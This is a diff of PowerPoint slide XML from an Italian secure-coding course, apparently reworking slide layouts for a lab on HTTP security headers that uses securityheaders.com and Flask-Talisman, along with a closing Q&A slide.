         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4820,13 +6271,13 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="0" y="0"/>
-            <a:ext cx="12191695" cy="777240"/>
+            <a:ext cx="4114800" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="0F2D52"/>
+            <a:srgbClr val="081B33"/>
           </a:solidFill>
           <a:ln>
             <a:noFill/>
@@ -4856,14 +6307,100 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvPr id="3" name="Rectangle 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4114800" y="0"/>
+            <a:ext cx="8046720" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="F1F4F8"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Rectangle 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4114800" y="0"/>
+            <a:ext cx="137160" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="164592"/>
-            <a:ext cx="10972800" cy="502920"/>
+            <a:off x="274320" y="2103120"/>
+            <a:ext cx="3657600" cy="2286000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4871,34 +6408,34 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="2400" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Test rapido del tuo sito</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="17000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="00A0B0"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>03</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1005840"/>
-            <a:ext cx="10972800" cy="5029200"/>
+            <a:off x="274320" y="4572000"/>
+            <a:ext cx="3657600" cy="457200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4906,240 +6443,97 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Vai su: securityheaders.com</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Inserisci il tuo dominio</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Ti dà un voto da F ad A+</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Confronto:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>  github.com → A</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>  Molti siti italiani PA → F</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Aggiungere tutti gli header in Flask: 10 minuti con Flask-Talisman</a:t>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="2000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="6FD8E0"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>PARTE</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="TextBox 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4572000" y="2286000"/>
+            <a:ext cx="7315200" cy="1645920"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="4400" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="0F2D52"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Lab + sicurezza headers</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4572000" y="3931920"/>
+            <a:ext cx="7315200" cy="1828800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1800" b="0" i="1">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Test del proprio sito con securityheaders.com</a:t>
             </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="5" name="Connector 4"/>
+          <p:cNvPr id="9" name="Connector 8"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -5174,14 +6568,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvPr id="10" name="TextBox 9"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5202,21 +6596,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="TextBox 10"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5275,7 +6669,7 @@
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="0F2D52"/>
+            <a:srgbClr val="081B33"/>
           </a:solidFill>
           <a:ln>
             <a:noFill/>
@@ -5311,11 +6705,247 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="8686800" y="457200"/>
-            <a:ext cx="3200400" cy="3200400"/>
+            <a:off x="8915400" y="228600"/>
+            <a:ext cx="2286000" cy="2286000"/>
           </a:xfrm>
           <a:prstGeom prst="ellipse">
             <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="25400">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Oval 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10149840" y="3749040"/>
+            <a:ext cx="1645920" cy="1645920"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="25400">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Oval 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4800600"/>
+            <a:ext cx="1371600" cy="1371600"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="25400">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="731520" y="1371600"/>
+            <a:ext cx="10058400" cy="2286000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="11000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Domande?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="7" name="Connector 6"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="731520" y="3840480"/>
+            <a:ext cx="2926080" cy="0"/>
+          </a:xfrm>
+          <a:prstGeom prst="line">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln w="50800">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="731520" y="4114800"/>
+            <a:ext cx="10058400" cy="457200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="2000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="00A0B0"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Riepilogo · Q&amp;A · Discussione</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="731520" y="5029200"/>
+            <a:ext cx="10058400" cy="914400"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
           </a:prstGeom>
           <a:solidFill>
             <a:srgbClr val="00A0B0"/>
@@ -5348,49 +6978,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
+          <p:cNvPr id="10" name="TextBox 9"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="1645920"/>
-            <a:ext cx="7315200" cy="2286000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="8800" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Domande?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="8686800" y="457200"/>
-            <a:ext cx="3200400" cy="3200400"/>
+            <a:off x="1005840" y="5029200"/>
+            <a:ext cx="9784080" cy="914400"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5403,79 +6998,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr sz="18000" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="4114800"/>
-            <a:ext cx="10058400" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="2200" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Cosa portarti via:</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="5303520"/>
-            <a:ext cx="10058400" cy="548640"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1800" b="0" i="1">
+              <a:rPr sz="1800" b="1" i="1">
                 <a:solidFill>
                   <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
@@ -5488,7 +7013,7 @@
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="8" name="Connector 7"/>
+          <p:cNvPr id="11" name="Connector 10"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -5523,14 +7048,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="9" name="TextBox 8"/>
+          <p:cNvPr id="12" name="TextBox 11"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5551,21 +7076,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5682,7 +7207,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Obiettivi</a:t>
+              <a:t>🎯  Obiettivi della lezione</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5695,8 +7220,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1005840"/>
-            <a:ext cx="10972800" cy="5029200"/>
+            <a:off x="457200" y="914400"/>
+            <a:ext cx="2286000" cy="2286000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5704,27 +7229,162 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="18000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="F1F4F8"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
